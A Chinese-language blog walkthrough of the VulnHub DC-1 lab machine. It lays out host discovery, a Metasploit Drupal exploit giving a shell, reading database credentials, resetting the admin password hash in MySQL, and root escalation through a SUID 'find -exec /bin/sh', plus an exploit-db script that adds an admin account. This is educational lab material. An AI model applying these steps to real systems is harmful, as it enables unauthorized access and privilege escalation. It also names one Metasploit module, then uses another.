【Vulnhub靶机系列】DC1
基本信息
Kali: 192.168.56.116
DC1: 192.168.56.115
实验过程
先在Kali中使用arp-scan进行主机探活
sudo arp-scan --interface=eth1 192.168.56.0/24
逐个排查发现DC1的IP地址为192.168.56.115
然后使用nmap对主机进行探测:
nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115
主机分别开了: 22,80,111端口
我们先从80端口入手
可以发现网站是Drupal cms管理系统
我们启动msf,搜索下Drupal可用的EXP
msf > search Drupal
这里我们选用
exploit/unix/webapp/drupal_drupalgeddon2
因为他是最新的,而且品质为excellent
msf6 > use exploit/unix/webapp/drupal_coder_exec
msf6 exploit(unix/webapp/drupal_coder_exec) > show options
msf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115
msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116
msf6 exploit(unix/webapp/drupal_coder_exec) > run
这样我们就可以成功得到一个会话
我们用会话返回一个shell
发现flag1.txt
查看下flag1.txt内容
给我们一个提示 Every good CMS needs a config file - and so do you.
百度drupal配置文件的位置
sites/default/files
里面可以看到数据库的账号密码,同时我们还可以看到flag2的内容说:爆破不是唯一获得访问权限方法
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
那么我们用获得数据库的账号密码登录下数据看看
这里需要注意的是,我们需要用python转换成标准的shell,否则就会出现下面的场景,进入mysql之后,shell就没有反应:
我们输入
python -c "import pty;pty.spawn('/bin/bash')"
mysql> show database;
mysql> use drupaldb;
mysql> show tables;
mysql> select * from users;
mysql> select name,pass from users;
这里的密码是经过drupal加密
在scripts的文件夹中有用来算密码的脚本,但是因为靶机的环境原因会报错。
网上找了下,直接用别人算好的hash进行替换
明文:password
密文:$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4
接下来我们把管理员的密码重置下
mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'
where name='admin';
然后进行登录
然后发现flag3
从flag3的内容可以看到,提示我们需要用find提权同时我们也可以在家目录中找到flag4.
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
我们使用find找下具有root权限的suid。
# -perm 按照文件权限来查找文件
# -u=w 基于用于可写查找
# -type f 查找普通类型文件
find / -perm -u=s -type f 2>/dev/null
可以看到find是可以用来提权的
我们尝试用find执行命令
# 这里需要注意-name参数填写的文件名,是需要系统真实存在的
www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \;
那么我们接下来用find提权
www‐data@DC‐1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;
这样我们就拿到最终的flag
额外内容
使用CVE2014-3704添加管理账号
在exploit-db中有可以直接利用的EXP,可以直接添加管理账号地址:https://www.exploit-db.com/exploits/34992 我们在Kali上开启HTTP服务,让靶机从Kali上下载EXP
然后我们通过这个EXP创建管理账号
www‐data@DC‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067
然后就可以正常登录
另一种查询具有root权限命令的find语句
find / -user root -perm -4000 -print 2>/dev/null
【Vulnhub靶机系列】DC1相关推荐
- Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- VulnHub靶机系列:Os-ByteSec
一 前言 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行.每个镜像 ...
- 【Vulnhub靶机系列】DC3
基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp‐scan ‐‐interface ...
- 【VulnHub靶机渗透】三:Billu_b0x
VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学). 文章目录 ...
- Vulnhub靶机DC系列-DC-8
Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...
- vulnhub靶机DC1
靶机DC1下载地址:https://www.vulnhub.com/entry/dc-1,292/ kali ip:192.168.70.129 靶机DC1IP:192.168.70.160 一.信息 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
最新文章
- Word中的自定义编号详解及疑难汇总!
- android studio 发布版本,Android Studio 4.1 Canary 版本发布
- Hibernate学习笔记--导航
- 微信小程序scroll-view去掉滚动条
- TensorFlow中RNN实现的正确打开方式(转)
- HTTPS加密原理(转)
- Surprise 使用本地数据
- 《深入分析Java Web技术内幕》读书笔记
- 第十二课:OpenGL扩展
- netperf mips 移植
- win10绝地求生游戏崩溃怎么解决
- 章文嵩博士和他背后的负载均衡(LOAD BANLANCER)帝国
- 南宁第四中学2021年高考成绩查询,2021高考结束,我们一同见证这些难忘的瞬间...
- vue练手小项目--眼镜在线试戴
- JavaWeb --MYSql(MySql基础,MySql高级,JDBC,从类路径下加载输入流对象)
- SQL xin手错误鉴赏以及成长小结
- 《Head First 设计模式》读书笔记——迭代器模式
- 沉浸式状态栏一行代码调用
- 欧美女性flash网页模板
- vue 视频播放插件vue-video-player的使用
热门文章
- 破拆机器人_灭火体验,消防炮、排烟机器人展示...长安多形式开展消防安全宣传月活动...
- vue office在线编辑_VUE和Antv G6实现在线拓扑图编辑
- MyBatis-动态sql语句-if用法——MySQL系列学习笔记
- 计算机系统的主存主要是由()构成的。【最全!最详细分析!】
- 21行代码AC_HDU 5935 Car【贪心, 精度】
- SpringMVC容器和Spring容器
- 数据库原理与应用(SQL Server)笔记 第七章 流程控制语句、系统内置函数
- java实验原理和图例_图例解析JDK,JRE,JVM概念及使用
- linux主机数据拷贝,linux 服务器之间拷贝文件
- string.h包含哪些函数_多个函数组合拳专治不规则时间转化难题|Excel134